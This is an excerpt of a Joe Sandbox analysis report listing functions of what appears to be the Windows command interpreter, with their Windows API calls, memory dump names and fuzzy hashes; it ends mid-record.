Instruction ID: 70061e3b7d9801c4f007c685448250b413077f4f829a76dfee190beb5c5fb4ef
Opcode Fuzzy Hash: 989dfed76e83e1e5127155f56046364be98515c6956e9669bb0cf7002a0e13e4
Instruction Fuzzy Hash: 95C1BF61E08682C1FA689B26D5163B962B1FF85B94F4C813DDA1EE72D5DF3CE845C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F88D80 Relevance: 9.1, APIs: 6, Instructions: 95
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF683F88DC4
_amsg_exit.MSVCRT ref: 00007FF683F88DE0
_initterm.MSVCRT ref: 00007FF683F88E64
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF683F88E91
exit.MSVCRT ref: 00007FF683F88EDE
_cexit.MSVCRT ref: 00007FF683F88EED

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
String ID:
API String ID: 4291973834-0
Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
Instruction ID: 0116b9965e9c2a7695f3d3df406f21add378a22d0c3ba955fb2801bc2cb02c38
Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
Instruction Fuzzy Hash: 2E41E321A48643C2FB649B52E99227963A1BF44388F08443EE95DF76E0DFBCE844C7C1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F789C0 Relevance: 9.1, APIs: 6, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF683F78A18

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

GetDriveTypeW.KERNELBASE ref: 00007FF683F78A62
GetVolumeInformationW.KERNELBASE ref: 00007FF683F78ABA
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F78AE1
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F8B3FC
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F8B424

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$DriveErrorInformationLastTypeVolume
String ID:
API String ID: 850181435-0
Opcode ID: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
Instruction ID: 1ba4b6f835123160b3d723a29114ab72685732f70c7921ee4bdc766759ca9b33
Opcode Fuzzy Hash: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
Instruction Fuzzy Hash: 71416D32608BC1CAEB608F21D8462E977B4FF89B48F494539DA4D9BB58CF38D545C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F84A14 Relevance: 7.5, APIs: 5, Instructions: 49
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84A28
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84A66
RtlAllocateHeap.NTDLL(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84A7D
memmove.MSVCRT(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84A9A
FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84AA2

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: EnvironmentHeapStrings$AllocateFreeProcessmemmove
String ID:
API String ID: 647542462-0
Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
Instruction ID: 4b0cb3db8e202cbc5185a32b0dae58d4f0a633e81c8918ae351b4d89197abcbe
Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
Instruction Fuzzy Hash: AC119E22A18B42C2DE149F42A406079BBA0FF89F84F4D9039DE4E67744DE3DE441C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F85CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF683F9C9EE,?,?,?,00007FF683F9EA6C,?,?,?,00007FF683F9E925), ref: 00007FF683F85CCB
GetExitCodeProcess.KERNELBASE(?,?,?,00007FF683F9C9EE,?,?,?,00007FF683F9EA6C,?,?,?,00007FF683F9E925), ref: 00007FF683F85CDF
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF683F85D03
fprintf.MSVCRT ref: 00007FF683F8F4A9
fflush.MSVCRT ref: 00007FF683F8F4C2

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
String ID:
API String ID: 1826527819-0
Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
Instruction ID: cd6908e673ccced85e9ac302b7de6c65c10f361cbdaff66bb5cc8de54d5f7e71
Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
Instruction Fuzzy Hash: 97012D3190C682CAEA045B25E4561B9BBA1FF8E759F485139E94FA73A2CF7C9044CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F83060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F81EA0: wcschr.MSVCRT ref: 00007FF683F81EB3

SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF683F792AC), ref: 00007FF683F830CA
SetErrorMode.KERNELBASE ref: 00007FF683F830DD
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F830F6
SetErrorMode.KERNELBASE ref: 00007FF683F83106

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ErrorMode$FullNamePathwcschr
String ID:
API String ID: 1464828906-0
Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
Instruction ID: cc0c5fec0e33b1db1fd4b9c4a612ecc00742845c0068f88a34b06df2ddea77d9
Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
Instruction Fuzzy Hash: 90310721E48612C2EB689F16A40107EB660FF59B84F5C8239DA5EE73E0DF7DE845C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7CA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F7CAB3
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F8C706

Strings

onecore\base\cmd\maxpathawarestring.cpp, xrefs: 00007FF683F8C6E5

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset
String ID: onecore\base\cmd\maxpathawarestring.cpp
API String ID: 2221118986-3416068913
Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
Instruction ID: 6feede19daedff8a263861b5c2af049aa0bb1972ef452dcfbd8b28b797625347
Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
Instruction Fuzzy Hash: 39118621A09782C1EF54CB55A1562B922A0BF84BA4F1C4239DE6DEB7D5DE2CD480C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7BE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F7BE52

Part of subcall function 00007FF683F7BFF0: wcschr.MSVCRT ref: 00007FF683F7C03E

Strings

COMSPEC, xrefs: 00007FF683F7BFC7
2, xrefs: 00007FF683F7BF20

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memsetwcschr
String ID: 2$COMSPEC
API String ID: 1764819092-1738800741
Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
Instruction ID: af8716c93a6102e24566c84b06c72139c0a399450dbd87d92bf2cd06a0a6fa80
Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
Instruction Fuzzy Hash: A5515B21A1A683C5FB689B2594433B922A1BF46B84F0C403ADA4DE77D5DE2CEC45C7C1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F82EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00007FF683F82FA1
wcschr.MSVCRT ref: 00007FF683F82FBC

Part of subcall function 00007FF683F8823C: FindFirstFileExW.KERNELBASE ref: 00007FF683F88280
Part of subcall function 00007FF683F8823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F8829D

wcsrchr.MSVCRT ref: 00007FF683F82FEF

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcschr$ErrorFileFindFirstLastwcsrchr
String ID:
API String ID: 4254246844-0
Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
Instruction ID: d44aa6577136afc23e71994883dfd9ec6f96f861a934b9bd8cb41dde16d9e0fe
Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
Instruction Fuzzy Hash: 2F41D125B48742D6EE288B02E44637967A0FF99B84F4C8439DA4E977A5DF3CE041C680

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F8498C Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F849BA
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F849C8
RtlFreeHeap.NTDLL ref: 00007FF683F849E0

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$EnvironmentFreeProcessVariable
String ID:
API String ID: 2643372051-0
Opcode ID: 3eb4ce940398ca8009a7b16f8ee82d547b33230cfdd527662f43d3989e43a2d7
Instruction ID: 1d7d41fffb16185e60e84b835374d7a436f19d32dc968dfcc39ba33230cf6e85
Opcode Fuzzy Hash: 3eb4ce940398ca8009a7b16f8ee82d547b33230cfdd527662f43d3989e43a2d7
Instruction Fuzzy Hash: 43F0F972A1DB82C1EB049B66F406074AAE1FF4D7A0B5D9238C52EA3390DE3C9444C680

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F85A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF683F85A89
SetConsoleMode.KERNELBASE ref: 00007FF683F85A9E
_get_osfhandle.MSVCRT ref: 00007FF683F85AAC

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _get_osfhandle$ConsoleMode
String ID:
API String ID: 1591002910-0
Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
Instruction ID: a6635ed4932f9209ec510f9700e4ad97301362453e92d870824ab20a3203159b
Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
Instruction Fuzzy Hash: F4F07474A0A642CBE6148B10E856478BBA0FF8AB15F48453DD90EA7320DF3CB815CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F8291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNELBASE ref: 00007FF683F8294A

Strings

:, xrefs: 00007FF683F82942

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: DriveType
String ID: :
API String ID: 338552980-336475711
Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
Instruction ID: 6eb34422e3af4cd4c2ab9edfe240db9a92ad67ce0dcc6c5d2dbbaadacc980aa3
Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
Instruction Fuzzy Hash: 80E06566618640C7D7209B50E45206AB760FF8D348F881529E98D93764DF3CD149CB08

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F85AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDA6
Part of subcall function 00007FF683F7CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDBD

Part of subcall function 00007FF683F80A6C: _wcsnicmp.MSVCRT ref: 00007FF683F80AFE
Part of subcall function 00007FF683F80A6C: memset.MSVCRT ref: 00007FF683F80B37
Part of subcall function 00007FF683F80A6C: wcschr.MSVCRT ref: 00007FF683F80B91
Part of subcall function 00007FF683F80A6C: wcsrchr.MSVCRT ref: 00007FF683F80C14

GetConsoleTitleW.KERNELBASE ref: 00007FF683F85B52

Part of subcall function 00007FF683F84224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F84297
Part of subcall function 00007FF683F84224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F842D7
Part of subcall function 00007FF683F84224: memset.MSVCRT ref: 00007FF683F842FD
Part of subcall function 00007FF683F84224: memset.MSVCRT ref: 00007FF683F84368
Part of subcall function 00007FF683F84224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F84380
Part of subcall function 00007FF683F84224: wcsrchr.MSVCRT ref: 00007FF683F843E6
Part of subcall function 00007FF683F84224: lstrcmpW.KERNELBASE ref: 00007FF683F84401

GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF683F85BC7

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocateInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
String ID:
API String ID: 346765439-0
Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
Instruction ID: 19ea750c31b89191539bc5f6b07da4c77d3847ee932a19d1baecf9d9648df71e
Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
Instruction Fuzzy Hash: 7831AA20B5C682C7FA28E726A4525BD6291FF89BC0F4C5039E94EE7B95DE3CE505C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F83A0C Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?,?,?,00007FF683F9EAC5,?,?,?,00007FF683F9E925,?,?,?,?,00007FF683F7B9B1), ref: 00007FF683F83A56

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
Instruction ID: 230b07895fc8e23185c6e8a976601797bce6d7cea3e4464d9575c8dd3fe369f2
Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
Instruction Fuzzy Hash: 53012D68E08643D5EF588756A4410B566A0FF4CB80B5CC039D50DF3764DE2CF481C3C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F89A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF683F89A86
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF683F89A97

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Concurrency::cancel_current_taskmalloc
String ID:
API String ID: 1412018758-0
Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
